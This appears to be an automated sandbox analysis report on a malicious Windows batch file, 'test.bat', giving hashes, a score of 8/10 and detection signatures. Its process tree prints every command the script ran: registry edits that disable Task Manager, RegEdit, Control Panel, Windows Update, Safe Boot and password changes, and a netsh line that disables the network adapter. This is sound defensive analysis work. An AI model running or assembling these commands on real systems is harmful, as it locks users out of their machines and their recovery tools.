Overview

overview

8

Static

static

1

test.bat

windows11-21h2-x64

8

Resubmissions

28-06-2024 12:52

240628-p32mkatblq 8

28-06-2024 12:50

240628-p3b2xazglf 8

Analysis

  • max time kernel
    0s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240508-en
  • resource tags

    arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    28-06-2024 12:50

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    test.bat

  • Size

    3KB

  • MD5

    252dfe9f4be7028477c9e5f9c847ce3c

  • SHA1

    62e44423243d9f0c5b51ed889236993880064cd1

  • SHA256

    0c5924fa33f3005938cf82c64cf548a6a96216c512b7377d13c72d81ecb18969

  • SHA512

    1a36e5896cc028acfdfccfb8d57c3c2fb8ea9440a45f0625cc9a001920174c789d78ce36ac30decb05dd50151a5a9bec7fa420717a39f7aff5a531c282f0c304

Score
8/10
evasionpersistenceprivilege_escalation

Malware Config

Signatures

  • Disables RegEdit via registry modification 1 IoCs
    evasion
  • Disables Task Manager via registry modification
    evasion
  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

    persistenceprivilege_escalation
  • Suspicious use of WriteProcessMemory 34 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\test.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1944
    • C:\Windows\system32\reg.exe
      REG add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
      2⤵
        PID:4448
      • C:\Windows\system32\reg.exe
        REG add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d 1 /f
        2⤵
        • Disables RegEdit via registry modification
        PID:3636
      • C:\Windows\system32\reg.exe
        REG ADD "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer" /v "NoActiveDesktop" /t REG_DWORD /d 00000001 /f
        2⤵
          PID:1460
        • C:\Windows\system32\reg.exe
          REG add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Network" /v "NoNetSetup" /t REG_DWORD /d 1 /f
          2⤵
            PID:4772
          • C:\Windows\system32\reg.exe
            REG add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Network" /v "NoNetSetupIDPage" /t REG_DWORD /d 1 /f
            2⤵
              PID:2016
            • C:\Windows\system32\reg.exe
              REG add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoWinKeys" /t REG_DWORD /d 1 /f
              2⤵
                PID:396
              • C:\Windows\system32\reg.exe
                REG add "HKLM\System\CurrentControlSet\Control\SafeBoot" /v "Minimal" /t REG_SZ /d "Disabled" /f
                2⤵
                  PID:4480
                • C:\Windows\system32\reg.exe
                  REG add "HKLM\System\CurrentControlSet\Control\SafeBoot" /v "Network" /t REG_SZ /d "Disabled" /f
                  2⤵
                    PID:3536
                  • C:\Windows\system32\reg.exe
                    REG add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WindowsUpdate" /v "DisableWindowsUpdateAccess" /t REG_DWORD /d 1 /f
                    2⤵
                      PID:4724
                    • C:\Windows\system32\reg.exe
                      REG add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowRun" /t REG_DWORD /d 1 /f
                      2⤵
                        PID:2524
                      • C:\Windows\system32\reg.exe
                        reg add "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem" /v DisableCalc /t REG_DWORD /d 1 /f
                        2⤵
                          PID:1408
                        • C:\Windows\system32\reg.exe
                          reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer" /v NoFileOperation /t REG_DWORD /d 1 /f
                          2⤵
                            PID:4084
                          • C:\Windows\system32\reg.exe
                            reg add "HKCUSOFTWAREPoliciesMicrosoftWindowsSystem" /v DisableCalculator /t REG_DWORD /d 1 /f
                            2⤵
                              PID:2264
                            • C:\Windows\system32\reg.exe
                              reg add "HKCUSOFTWAREPoliciesMicrosoftWindowsSystem" /v DisableMSpaint /t REG_DWORD /d 1 /f
                              2⤵
                                PID:488
                              • C:\Windows\system32\reg.exe
                                REG ADD "HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced" /V DisableControlPanel /T REG_DWORD /D 1 /F
                                2⤵
                                  PID:4076
                                • C:\Windows\system32\reg.exe
                                  reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionPoliciesSystem" /v DisableChangePassword /t REG_DWORD /d 1 /f
                                  2⤵
                                    PID:2832
                                  • C:\Windows\system32\netsh.exe
                                    netsh interface set interface "Ethernet" disable
                                    2⤵
                                    • Event Triggered Execution: Netsh Helper DLL
                                    PID:4876
                                • C:\Windows\System32\svchost.exe
                                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s Netman
                                  1⤵
                                    PID:2396

                                  Network

                                  MITRE ATT&CK Enterprise v15

                                  Replay Monitor

                                  Loading Replay Monitor...

                                  Downloads